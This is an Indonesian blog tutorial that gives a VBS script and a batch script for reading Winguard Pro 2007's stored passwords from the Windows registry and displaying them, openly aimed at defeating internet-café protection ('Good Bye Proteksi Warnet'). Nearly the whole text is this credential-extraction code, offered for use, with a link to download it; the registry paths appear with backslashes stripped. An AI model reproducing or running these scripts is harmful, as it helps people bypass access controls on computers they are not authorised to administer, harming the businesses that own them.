....
   
  Selamat datang
  Membuat Script untuk mengintip password Winguard Pro 2007
 
Selamat Pagi, Saudara sebangsa setanah air, senang sekali saya bisa berjumpa kembali dengan anda ( kok kayak MC ya ? ) Pada kesempatan kali ini saya ingin berbagi cara membuat script untuk mendapatkan password Winguard Pro terutama untuk versi 2007. Seperti kita ketahui Winguard Pro adalah termasuk salah satu program populer di warnet-warnet so anak warnet - jangat lewatkan tutorial ini. Kali ini saya ingin membagi dua macam script yang satu bat yang satu vbs, pokoknya semua kebagian deh ...(Hi hi hi kayak pembagian BLT aja) OKe ...saya hentikan dulu basa-basinya. Sekarang kita mulai dulu dengan script vbs : Untuk mengintip password Winguard Pro dengan cepat, ketiklah tulisan di bawah ini dengan Notepad dan simpan dengan ekstensi vbs ' INTIP WINGUARD PRO 2007 by EKO.A Dim WinguardPro2007, Registri, BacaPassword_00, BacaPassword_01, BacaPassword_02 Set WinguardPro2007 = CreateObject("WScript.Shell") Registri = "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" on error resume next BacaPassword_00 = WinguardPro2007.RegRead(Registri & "title0") BacaPassword_01 = WinguardPro2007.RegRead(Registri & "title1") BacaPassword_02 = WinguardPro2007.regread(Registri & "title2") WScript.echo "Intip Winguard Pro 2007 - by Eko.A"& vbcrlf &_ ""& vbcrlf &_ "Password Enkripsi File : "& BacaPassword_00 & vbcrlf &_ "Password Konfigurasi : "& BacaPassword_01 & vbcrlf &_ "Password Program : "& BacaPassword_02 Bagi sampeyan yang lebih senang dengan script bat, ketik script dibawah ini dengan Notepad dan simpan dengan ekstensi bat. @ECHO OFF Title Intip Password Winguard Pro versi 2007 - by Eko Echo. Rem delims : TAB diikuti spasi FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" /v title0') DO SET Pass_Enkrips=%%B ECHO Password Enkripsi File = %Pass_Enkrips% FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" /v title1') DO SET Pass_Konfig=%%B ECHO Password Konfigurasi = %Pass_Konfig% FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" /v title2') DO SET Pass_Aplik=%%B ECHO Password Program = %Pass_Aplik% Echo. pause exit Bagi rekan-rekan yang nggak mau repot nulis script, script di atas bisa sampeyan download di : http://lovepassword.blogspot.com/2008/05/ membuat-script-untuk-mengintip-password.html Ubah ekstensi txt dengan ekstensi yang sesuai agar script bisa dijalankan. Begitu file anda klik 2x maka password Winguard Pro akan langsung ditampilkan. Good Bye Proteksi Warnet.
 
   
 
=> Do you also want a homepage for free? Then click here! <=